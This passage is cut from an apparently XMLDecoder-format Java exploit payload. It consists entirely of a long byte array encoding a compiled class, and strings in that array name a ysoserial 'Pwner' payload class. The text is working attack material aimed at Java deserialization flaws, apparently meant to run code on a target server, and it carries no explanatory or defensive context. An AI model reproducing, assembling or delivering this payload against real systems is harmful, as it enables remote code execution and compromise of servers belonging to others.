index=\"3247\"><byte>97</byte></void><void index=\"3248\"><byte>109</byte></void><void index=\"3249\"><byte>59</byte></void><void index=\"3250\"><byte>12</byte></void><void index=\"3251\"><byte>0</byte></void><void index=\"3252\"><byte>-88</byte></void><void index=\"3253\"><byte>0</byte></void><void index=\"3254\"><byte>-87</byte></void><void index=\"3255\"><byte>9</byte></void><void index=\"3256\"><byte>0</byte></void><void index=\"3257\"><byte>107</byte></void><void index=\"3258\"><byte>0</byte></void><void index=\"3259\"><byte>-86</byte></void><void index=\"3260\"><byte>1</byte></void><void index=\"3261\"><byte>0</byte></void><void index=\"3262\"><byte>19</byte></void><void index=\"3263\"><byte>106</byte></void><void index=\"3264\"><byte>97</byte></void><void index=\"3265\"><byte>118</byte></void><void index=\"3266\"><byte>97</byte></void><void index=\"3267\"><byte>47</byte></void><void index=\"3268\"><byte>108</byte></void><void index=\"3269\"><byte>97</byte></void><void index=\"3270\"><byte>110</byte></void><void index=\"3271\"><byte>103</byte></void><void index=\"3272\"><byte>47</byte></void><void index=\"3273\"><byte>84</byte></void><void index=\"3274\"><byte>104</byte></void><void index=\"3275\"><byte>114</byte></void><void index=\"3276\"><byte>111</byte></void><void index=\"3277\"><byte>119</byte></void><void index=\"3278\"><byte>97</byte></void><void index=\"3279\"><byte>98</byte></void><void index=\"3280\"><byte>108</byte></void><void index=\"3281\"><byte>101</byte></void><void index=\"3282\"><byte>7</byte></void><void index=\"3283\"><byte>0</byte></void><void index=\"3284\"><byte>-84</byte></void><void index=\"3285\"><byte>10</byte></void><void index=\"3286\"><byte>0</byte></void><void index=\"3287\"><byte>-83</byte></void><void index=\"3288\"><byte>0</byte></void><void index=\"3289\"><byte>91</byte></void><void index=\"3290\"><byte>1</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>19</byte></void><void index=\"3293\"><byte>106</byte></void><void index=\"3294\"><byte>97</byte></void><void index=\"3295\"><byte>118</byte></void><void index=\"3296\"><byte>97</byte></void><void index=\"3297\"><byte>47</byte></void><void index=\"3298\"><byte>105</byte></void><void index=\"3299\"><byte>111</byte></void><void index=\"3300\"><byte>47</byte></void><void index=\"3301\"><byte>80</byte></void><void index=\"3302\"><byte>114</byte></void><void index=\"3303\"><byte>105</byte></void><void index=\"3304\"><byte>110</byte></void><void index=\"3305\"><byte>116</byte></void><void index=\"3306\"><byte>83</byte></void><void index=\"3307\"><byte>116</byte></void><void index=\"3308\"><byte>114</byte></void><void index=\"3309\"><byte>101</byte></void><void index=\"3310\"><byte>97</byte></void><void index=\"3311\"><byte>109</byte></void><void index=\"3312\"><byte>7</byte></void><void index=\"3313\"><byte>0</byte></void><void index=\"3314\"><byte>-81</byte></void><void index=\"3315\"><byte>1</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>7</byte></void><void index=\"3318\"><byte>112</byte></void><void index=\"3319\"><byte>114</byte></void><void index=\"3320\"><byte>105</byte></void><void index=\"3321\"><byte>110</byte></void><void index=\"3322\"><byte>116</byte></void><void index=\"3323\"><byte>108</byte></void><void index=\"3324\"><byte>110</byte></void><void index=\"3325\"><byte>12</byte></void><void index=\"3326\"><byte>0</byte></void><void index=\"3327\"><byte>-79</byte></void><void index=\"3328\"><byte>0</byte></void><void index=\"3329\"><byte>71</byte></void><void index=\"3330\"><byte>10</byte></void><void index=\"3331\"><byte>0</byte></void><void index=\"3332\"><byte>-80</byte></void><void index=\"3333\"><byte>0</byte></void><void index=\"3334\"><byte>-78</byte></void><void index=\"3335\"><byte>1</byte></void><void index=\"3336\"><byte>0</byte></void><void index=\"3337\"><byte>15</byte></void><void index=\"3338\"><byte>112</byte></void><void index=\"3339\"><byte>114</byte></void><void index=\"3340\"><byte>105</byte></void><void index=\"3341\"><byte>110</byte></void><void index=\"3342\"><byte>116</byte></void><void index=\"3343\"><byte>83</byte></void><void index=\"3344\"><byte>116</byte></void><void index=\"3345\"><byte>97</byte></void><void index=\"3346\"><byte>99</byte></void><void index=\"3347\"><byte>107</byte></void><void index=\"3348\"><byte>84</byte></void><void index=\"3349\"><byte>114</byte></void><void index=\"3350\"><byte>97</byte></void><void index=\"3351\"><byte>99</byte></void><void index=\"3352\"><byte>101</byte></void><void index=\"3353\"><byte>12</byte></void><void index=\"3354\"><byte>0</byte></void><void index=\"3355\"><byte>-76</byte></void><void index=\"3356\"><byte>0</byte></void><void index=\"3357\"><byte>11</byte></void><void index=\"3358\"><byte>10</byte></void><void index=\"3359\"><byte>0</byte></void><void index=\"3360\"><byte>-83</byte></void><void index=\"3361\"><byte>0</byte></void><void index=\"3362\"><byte>-75</byte></void><void index=\"3363\"><byte>1</byte></void><void index=\"3364\"><byte>0</byte></void><void index=\"3365\"><byte>13</byte></void><void index=\"3366\"><byte>83</byte></void><void index=\"3367\"><byte>116</byte></void><void index=\"3368\"><byte>97</byte></void><void index=\"3369\"><byte>99</byte></void><void index=\"3370\"><byte>107</byte></void><void index=\"3371\"><byte>77</byte></void><void index=\"3372\"><byte>97</byte></void><void index=\"3373\"><byte>112</byte></void><void index=\"3374\"><byte>84</byte></void><void index=\"3375\"><byte>97</byte></void><void index=\"3376\"><byte>98</byte></void><void index=\"3377\"><byte>108</byte></void><void index=\"3378\"><byte>101</byte></void><void index=\"3379\"><byte>1</byte></void><void index=\"3380\"><byte>0</byte></void><void index=\"3381\"><byte>29</byte></void><void index=\"3382\"><byte>121</byte></void><void index=\"3383\"><byte>115</byte></void><void index=\"3384\"><byte>111</byte></void><void index=\"3385\"><byte>115</byte></void><void index=\"3386\"><byte>101</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>105</byte></void><void index=\"3389\"><byte>97</byte></void><void index=\"3390\"><byte>108</byte></void><void index=\"3391\"><byte>47</byte></void><void index=\"3392\"><byte>80</byte></void><void index=\"3393\"><byte>119</byte></void><void index=\"3394\"><byte>110</byte></void><void index=\"3395\"><byte>101</byte></void><void index=\"3396\"><byte>114</byte></void><void index=\"3397\"><byte>52</byte></void><void index=\"3398\"><byte>53</byte></void><void index=\"3399\"><byte>52</byte></void><void index=\"3400\"><byte>51</byte></void><void index=\"3401\"><byte>56</byte></void><void index=\"3402\"><byte>51</byte></void><void index=\"3403\"><byte>49</byte></void><void index=\"3404\"><byte>52</byte></void><void index=\"3405\"><byte>50</byte></void><void index=\"3406\"><byte>55</byte></void><void index=\"3407\"><byte>56</byte></void><void index=\"3408\"><byte>57</byte></void><void index=\"3409\"><byte>57</byte></void><void index=\"3410\"><byte>50</byte></void><void index=\"3411\"><byte>1</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>31</byte></void><void index=\"3414\"><byte>76</byte></void><void index=\"3415\"><byte>121</byte></void><void index=\"3416\"><byte>115</byte></void><void index=\"3417\"><byte>111</byte></void><void index=\"3418\"><byte>115</byte></void><void index=\"3419\"><byte>101</byte></void><void index=\"3420\"><byte>114</byte></void><void index=\"3421\"><byte>105</byte></void><void index=\"3422\"><byte>97</byte></void><void index=\"3423\"><byte>108</byte></void><void index=\"3424\"><byte>47</byte></void><void index=\"3425\"><byte>80</byte></void><void index=\"3426\"><byte>119</byte></void><void index=\"3427\"><byte>110</byte></void><void index=\"3428\"><byte>101</byte></void><void index=\"3429\"><byte>114</byte></void><void index=\"3430\"><byte>52</byte></void><void index=\"3431\"><byte>53</byte></void><void index=\"3432\"><byte>52</byte></void><void index=\"3433\"><byte>51</byte></void><void index=\"3434\"><byte>56</byte></void><void index=\"3435\"><byte>51</byte></void><void index=\"3436\"><byte>49</byte></void><void index=\"3437\"><byte>52</byte></void><void index=\"3438\"><byte>50</byte></void><void index=\"3439\"><byte>55</byte></void><void index=\"3440\"><byte>56</byte></void><void index=\"3441\"><byte>57</byte></void><void index=\"3442\"><byte>57</byte></void><void index=\"3443\"><byte>50</byte></void><void index=\"3444\"><byte>59</byte></void><void index=\"3445\"><byte>0</byte></void><void index=\"3446\"><byte>33</byte></void><void index=\"3447\"><byte>0</byte></void><void index=\"3448\"><byte>2</byte></void><void index=\"3449\"><byte>0</byte></void><void index=\"3450\"><byte>3</byte></void><void index=\"3451\"><byte>0</byte></void><void index=\"3452\"><byte>1</byte></void><void index=\"3453\"><byte>0</byte></void><void index=\"3454\"><byte>4</byte></void><void index=\"3455\"><byte>0</byte></void><void index=\"3456\"><byte>1</byte></void><void index=\"3457\"><byte>0</byte></void><void index=\"3458\"><byte>26</byte></void><void index=\"3459\"><byte>0</byte></void><void index=\"3460\"><byte>5</byte></void><void index=\"3461\"><byte>0</byte></void><void index=\"3462\"><byte>6</byte></void><void index=\"3463\"><byte>0</byte></void><void index=\"3464\"><byte>1</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>7</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>2</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>8</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>4</byte></void><void index=\"3475\"><byte>0</byte></void><void index=\"3476\"><byte>1</byte></void><void index=\"3477\"><byte>0</byte></void><void index=\"3478\"><byte>10</byte></void><void index=\"3479\"><byte>0</byte></void><void index=\"3480\"><byte>11</byte></void><void index=\"3481\"><byte>0</byte></void><void index=\"3482\"><byte>1</byte></void><void index=\"3483\"><byte>0</byte></void><void index=\"3484\"><byte>12</byte></void><void index=\"3485\"><byte>0</byte></void><void index=\"3486\"><byte>0</byte></void><void index=\"3487\"><byte>0</byte></void><void index=\"3488\"><byte>47</byte></void><void index=\"3489\"><byte>0</byte></void><void index=\"3490\"><byte>1</byte></void><void index=\"3491\"><byte>0</byte></void><void index=\"3492\"><byte>1</byte></void><void index=\"3493\"><byte>0</byte></void><void index=\"3494\"><byte>0</byte></void><void index=\"3495\"><byte>0</byte></void><void index=\"3496\"><byte>5</byte></void><void index=\"3497\"><byte>42</byte></void><void index=\"3498\"><byte>-73</byte></void><void index=\"3499\"><byte>0</byte></void><void index=\"3500\"><byte>1</byte></void><void index=\"3501\"><byte>-79</byte></void><void index=\"3502\"><byte>0</byte></void><void index=\"3503\"><byte>0</byte></void><void index=\"3504\"><byte>0</byte></void><void index=\"3505\"><byte>2</byte></void><void index=\"3506\"><byte>0</byte></void><void index=\"3507\"><byte>13</byte></void><void index=\"3508\"><byte>0</byte></void><void index=\"3509\"><byte>0</byte></void><void index=\"3510\"><byte>0</byte></void><void index=\"3511\"><byte>6</byte></void><void index=\"3512\"><byte>0</byte></void><void index=\"3513\"><byte>1</byte></void><void index=\"3514\"><byte>0</byte></void><void index=\"3515\"><byte>0</byte></void><void index=\"3516\"><byte>0</byte></void><void index=\"3517\"><byte>47</byte></void><void index=\"3518\"><byte>0</byte></void><void index=\"3519\"><byte>14</byte></void><void index=\"3520\"><byte>0</byte></void><void index=\"3521\"><byte>0</byte></void><void index=\"3522\"><byte>0</byte></void><void index=\"3523\"><byte>12</byte></void><void index=\"3524\"><byte>0</byte></void><void index=\"3525\"><byte>1</byte></void><void index=\"3526\"><byte>0</byte></void><void index=\"3527\"><byte>0</byte></void><void index=\"3528\"><byte>0</byte></void><void index=\"3529\"><byte>5</byte></void><void index=\"3530\"><byte>0</byte></void><void index=\"3531\"><byte>15</byte></void><void index=\"3532\"><byte>0</byte></void><void index=\"3533\"><byte>-71</byte></void><void index=\"3534\"><byte>0</byte></void><void index=\"3535\"><byte>0</byte></void><void index=\"3536\"><byte>0</byte></void><void index=\"3537\"><byte>1</byte></void><void index=\"3538\"><byte>0</byte></void><void index=\"3539\"><byte>19</byte></void><void index=\"3540\"><byte>0</byte></void><void index=\"3541\"><byte>20</byte></void><void index=\"3542\"><byte>0</byte></void><void index=\"3543\"><byte>2</byte></void><void index=\"3544\"><byte>0</byte></void><void index=\"3545\"><byte>12</byte></void><void index=\"3546\"><byte>0</byte></void><void index=\"3547\"><byte>0</byte></void><void index=\"3548\"><byte>0</byte></void><void index=\"3549\"><byte>63</byte></void><void index=\"3550\"><byte>0</byte></void><void index=\"3551\"><byte>0</byte></void><void index=\"3552\"><byte>0</byte></void><void index=\"3553\"><byte>3</byte></void><void index=\"3554\"><byte>0</byte></void><void index=\"3555\"><byte>0</byte></void><void index=\"3556\"><byte>0</byte></void><void index=\"3557\"><byte>1</byte></void><void index=\"3558\"><byte>-79</byte></void><void index=\"3559\"><byte>0</byte></void><void index=\"3560\"><byte>0</byte></void><void index=\"3561\"><byte>0</byte></void><void index=\"3562\"><byte>2</byte></void><void index=\"3563\"><byte>0</byte></void><void index=\"3564\"><byte>13</byte></void><void index=\"3565\"><byte>0</byte></void><void index=\"3566\"><byte>0</byte></void><void index=\"3567\"><byte>0</byte></void><void index=\"3568\"><byte>6</byte></void><void index=\"3569\"><byte>0</byte></void><void index=\"3570\"><byte>1</byte></void><void index=\"3571\"><byte>0</byte></void><void index=\"3572\"><byte>0</byte></void><void index=\"3573\"><byte>0</byte></void><void index=\"3574\"><byte>52</byte></void><void index=\"3575\"><byte>0</byte></void><void index=\"3576\"><byte>14</byte></void><void index=\"3577\"><byte>0</byte></void><void index=\"3578\"><byte>0</byte></void><void index=\"3579\"><byte>0</byte></void><void index=\"3580\"><byte>32</byte></void><void index=\"3581\"><byte>0</byte></void><void index=\"3582\"><byte>3</byte></void><void index=\"3583\"><byte>0</byte></void><void index=\"3584\"><byte>0</byte></void><void index=\"3585\"><byte>0</byte></void><void index=\"3586\"><byte>1</byte></void><void index=\"3587\"><byte>0</byte></void><void index=\"3588\"><byte>15</byte></void><void index=\"3589\"><byte>0</byte></void><void index=\"3590\"><byte>-71</byte></void><void index=\"3591\"><byte>0</byte></void><void index=\"3592\"><byte>0</byte></void><void index=\"3593\"><byte>0</byte></void><void index=\"3594\"><byte>0</byte></void><void index=\"3595\"><byte>0</byte></void><void index=\"3596\"><byte>1</byte></void><void index=\"3597\"><byte>0</byte></void><void index=\"3598\"><byte>21</byte></void><void index=\"3599\"><byte>0</byte></void><void index=\"3600\"><byte>22</byte></void><void index=\"3601\"><byte>0</byte></void><void index=\"3602\"><byte>1</byte></void><void index=\"3603\"><byte>0</byte></void><void index=\"3604\"><byte>0</byte></void><void index=\"3605\"><byte>0</byte></void><void index=\"3606\"><byte>1</byte></void><void index=\"3607\"><byte>0</byte></void><void index=\"3608\"><byte>23</byte></void><void index=\"3609\"><byte>0</byte></void><void index=\"3610\"><byte>24</byte></void><void index=\"3611\"><byte>0</byte></void><void index=\"3612\"><byte>2</byte></void><void index=\"3613\"><byte>0</byte></void><void index=\"3614\"><byte>25</byte></void><void index=\"3615\"><byte>0</byte></void><void index=\"3616\"><byte>0</byte></void><void index=\"3617\"><byte>0</byte></void><void index=\"3618\"><byte>4</byte></void><void index=\"3619\"><byte>0</byte></void><void index=\"3620\"><byte>1</byte></void><void index=\"3621\"><byte>0</byte></void><void index=\"3622\"><byte>26</byte></void><void index=\"3623\"><byte>0</byte></void><void index=\"3624\"><byte>1</byte></void><void index=\"3625\"><byte>0</byte></void><void index=\"3626\"><byte>19</byte></void><void index=\"3627\"><byte>0</byte></void><void index=\"3628\"><byte>27</byte></void><void index=\"3629\"><byte>0</byte></void><void index=\"3630\"><byte>2</byte></void><void index=\"3631\"><byte>0</byte></void><void index=\"3632\"><byte>12</byte></void><void index=\"3633\"><byte>0</byte></void><void index=\"3634\"><byte>0</byte></void><void index=\"3635\"><byte>0</byte></void><void index=\"3636\"><byte>73</byte></void><void index=\"3637\"><byte>0</byte></void><void index=\"3638\"><byte>0</byte></void><void index=\"3639\"><byte>0</byte></void><void index=\"3640\"><byte>4</byte></void><void index=\"3641\"><byte>0</byte></void><void index=\"3642\"><byte>0</byte></void><void index=\"3643\"><byte>0</byte></void><void index=\"3644\"><byte>1</byte></void><void index=\"3645\"><byte>-79</byte></void><void index=\"3646\"><byte>0</byte></void><void index=\"3647\"><byte>0</byte></void><void index=\"3648\"><byte>0</byte></void><void index=\"3649\"><byte>2</byte></void><void index=\"3650\"><byte>0</byte></void><void index=\"3651\"><byte>13</byte></void><void index=\"3652\"><byte>0</byte></void><void index=\"3653\"><byte>0</byte></void><void index=\"3654\"><byte>0</byte></void><void index=\"3655\"><byte>6</byte></void><void index=\"3656\"><byte>0</byte></void><void index=\"3657\"><byte>1</byte></void><void index=\"3658\"><byte>0</byte></void><void index=\"3659\"><byte>0</byte></void><void index=\"3660\"><byte>0</byte></void><void index=\"3661\"><byte>56</byte></void><void index=\"3662\"><byte>0</byte></void><void index=\"3663\"><byte>14</byte></void><void index=\"3664\"><byte>0</byte></void><void index=\"3665\"><byte>0</byte></void><void index=\"3666\"><byte>0</byte></void><void index=\"3667\"><byte>42</byte></void><void index=\"3668\"><byte>0</byte></void><void index=\"3669\"><byte>4</byte></void><void index=\"3670\"><byte>0</byte></void><void index=\"3671\"><byte>0</byte></void><void index=\"3672\"><byte>0</byte></void><void index=\"3673\"><byte>1</byte></void><void index=\"3674\"><byte>0</byte></void><void index=\"3675\"><byte>15</byte></void><void index=\"3676\"><byte>0</byte></void><void index=\"3677\"><byte>-71</byte></void><void index=\"3678\"><byte>0</byte></void><void index=\"3679\"><byte>0</byte></void><void index=\"3680\"><byte>0</byte></void><void index=\"3681\"><byte>0</byte></void><void index=\"3682\"><byte>0</byte></void><void index=\"3683\"><byte>1</byte></void><void index=\"3684\"><byte>0</byte></void><void index=\"3685\"><byte>21</byte></void><void index=\"3686\"><byte>0</byte></void><void index=\"3687\"><byte>22</byte></void><void index=\"3688\"><byte>0</byte></void><void index=\"3689\"><byte>1</byte></void><void index=\"3690\"><byte>0</byte></void><void index=\"3691\"><byte>0</byte></void><void index=\"3692\"><byte>0</byte></void><void index=\"3693\"><byte>1</byte></void><void index=\"3694\"><byte>0</byte></void><void index=\"3695\"><byte>28</byte></void><void index=\"3696\"><byte>0</byte></void><void index=\"3697\"><byte>29</byte></void><void index=\"3698\"><byte>0</byte></void><void index=\"3699\"><byte>2</byte></void><void index=\"3700\"><byte>0</byte></void><void index=\"3701\"><byte>0</byte></void><void index=\"3702\"><byte>0</byte></void><void index=\"3703\"><byte>1</byte></void><void index=\"3704\"><byte>0</byte></void><void index=\"3705\"><byte>30</byte></void><void index=\"3706\"><byte>0</byte></void><void index=\"3707\"><byte>31</byte></void><void index=\"3708\"><byte>0</byte></void><void index=\"3709\"><byte>3</byte></void><void index=\"3710\"><byte>0</byte></void><void index=\"3711\"><byte>25</byte></void><void index=\"3712\"><byte>0</byte></void><void index=\"3713\"><byte>0</byte></void><void index=\"3714\"><byte>0</byte></void><void index=\"3715\"><byte>4</byte></void><void index=\"3716\"><byte>0</byte></void><void index=\"3717\"><byte>1</byte></void><void index=\"3718\"><byte>0</byte></void><void index=\"3719\"><byte>26</byte></void><void index=\"3720\"><byte>0</byte></void><void index=\"3721\"><byte>8</byte></void><void index=\"3722\"><byte>0</byte></void><void index=\"3723\"><byte>41</byte></void><void index=\"3724\"><byte>0</byte></void><void index=\"3725\"><byte>11</byte></void><void index=\"3726\"><byte>0</byte></void><void index=\"3727\"><byte>1</byte></void><void index=\"3728\"><byte>0</byte></void><void index=\"3729\"><byte>12</byte></void><void index=\"3730\"><byte>0</byte></void><void index=\"3731\"><byte>0</byte></void><void index=\"3732\"><byte>1</byte></void><void index=\"3733\"><byte>114</byte></void><void index=\"3734\"><byte>0</byte></void><void index=\"3735\"><byte>7</byte></void><void index=\"3736\"><byte>0</byte></void><void index=\"3737\"><byte>11</byte></void><void index=\"3738\"><byte>0</byte></void><void index=\"3739\"><byte>0</byte></void><void index=\"3740\"><byte>1</byte></void><void index=\"3741\"><byte>18</byte></void><void index=\"3742\"><byte>-89</byte></void><void index=\"3743\"><byte>0</byte></void><void index=\"3744\"><byte>3</byte></void><void index=\"3745\"><byte>1</byte></void><void index=\"3746\"><byte>76</byte></void><void index=\"3747\"><byte>-72</byte></void><void index=\"3748\"><byte>0</byte></void><void index=\"3749\"><byte>47</byte></void><void index=\"3750\"><byte>-64</byte></void><void index=\"3751\"><byte>0</byte></void><void index=\"3752\"><byte>49</byte></void><void index=\"3753\"><byte>-74</byte></void><void index=\"3754\"><byte>0</byte></void><void index=\"3755\"><byte>53</byte></void><void index=\"3756\"><byte>-64</byte></void><void index=\"3757\"><byte>0</byte></void><void index=\"3758\"><byte>55</byte></void><void index=\"3759\"><byte>18</byte></void><void index=\"3760\"><byte>57</byte></void><void index=\"3761\"><byte>-74</byte></void><void index=\"3762\"><byte>0</byte></void><void index=\"3763\"><byte>61</byte></void><void index=\"3764\"><byte>77</byte></void><void index=\"3765\"><byte>-72</byte></void><void index=\"3766\"><byte>0</byte></void><void index=\"3767\"><byte>47</byte></void><void index=\"3768\"><byte>-64</byte></void><void index=\"3769\"><byte>0</byte></void><void index=\"3770\"><byte>49</byte></void><void index=\"3771\"><byte>-74</byte></void><void index=\"3772\"><byte>0</byte></void><void index=\"3773\"><byte>53</byte></void><void index=\"3774\"><byte>-64</byte></void><void index=\"3775\"><byte>0</byte></void><void index=\"3776\"><byte>55</byte></void><void index=\"3777\"><byte>-74</byte></void><void index=\"3778\"><byte>0</byte></void><void index=\"3779\"><byte>65</byte></void><void index=\"3780\"><byte>78</byte></void><void index=\"3781\"><byte>45</byte></void><void index=\"3782\"><byte>18</byte></void><void index=\"3783\"><byte>67</byte></void><void index=\"3784\"><byte>-74</byte></void><void index=\"3785\"><byte>0</byte></void><void index=\"3786\"><byte>73</byte></void><void index=\"3787\"><byte>45</byte></void><void index=\"3788\"><byte>-74</byte></void><void index=\"3789\"><byte>0</byte></void><void index=\"3790\"><byte>77</byte></void><void index=\"3791\"><byte>58</byte></void><void index=\"3792\"><byte>4</byte></void><void index=\"3793\"><byte>25</byte></void><void index=\"3794\"><byte>4</byte></void><void index=\"3795\"><byte>-69</byte></void><void index=\"3796\"><byte>0</byte></void><void index=\"3797\"><byte>79</byte></void><void index=\"3798\"><byte>89</byte></void><void index=\"3799\"><byte>-69</byte></void><void index=\"3800\"><byte>0</byte></void><void index=\"3801\"><byte>81</byte></void><void index=\"3802\"><byte>89</byte></void><void index=\"3803\"><byte>-73</byte></void><void index=\"3804\"><byte>0</byte></void><void index=\"3805\"><byte>82</byte></void><void index=\"3806\"><byte>44</byte></void><void index=\"3807\"><byte>-74</byte></void><void index=\"3808\"><byte>0</byte></void><void index=\"3809\"><byte>86</byte></void><void index=\"3810\"><byte>18</byte></void><void index=\"3811\"><byte>88</byte></void><void index=\"3812\"><byte>-74</byte></void><void index=\"3813\"><byte>0</byte></void><void index=\"3814\"><byte>86</byte></void><void index=\"3815\"><byte>-74</byte></void><void index=\"3816\"><byte>0</byte></void><void index=\"3817\"><byte>92</byte></void><void index=\"3818\"><byte>-73</byte></void><void index=\"3819\"><byte>0</byte></void><void index=\"3820\"><byte>94</byte></void><void index=\"3821\"><byte>-74</byte></void><void index=\"3822\"><byte>0</byte></void><void index=\"3823\"><byte>100</byte></void><void index=\"3824\"><byte>25</byte></void><void index=\"3825\"><byte>4</byte></void><void index=\"3826\"><byte>-74</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>103</byte></void><void index=\"3829\"><byte>18</byte></void><void index=\"3830\"><byte>105</byte></void><void index=\"3831\"><byte>-72</byte></void><void index=\"3832\"><byte>0</byte></void><void index=\"3833\"><byte>110</byte></void><void index=\"3834\"><byte>58</byte></void><void index=\"3835\"><byte>5</byte></void><void index=\"3836\"><byte>25</byte></void><void index=\"3837\"><byte>5</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>-91</byte></void><void index=\"3840\"><byte>0</byte></void><void index=\"3841\"><byte>16</byte></void><void index=\"3842\"><byte>25</byte></void><void index=\"3843\"><byte>5</byte></void><void index=\"3844\"><byte>-74</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>115</byte></void><void index=\"3847\"><byte>18</byte></void><void index=\"3848\"><byte>117</byte></void><void index=\"3849\"><byte>-74</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>121</byte></void><void index=\"3852\"><byte>-102</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>6</byte></void><void index=\"3855\"><byte>-89</byte></void><void index=\"3856\"><byte>0</byte></void><void index=\"3857\"><byte>33</byte></void><void index=\"3858\"><byte>-72</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>127</byte></void><void index=\"3861\"><byte>-69</byte></void><void index=\"3862\"><byte>0</byte></void><void index=\"3863\"><byte>81</byte></void><void index=\"3864\"><byte>89</byte></void><void index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void 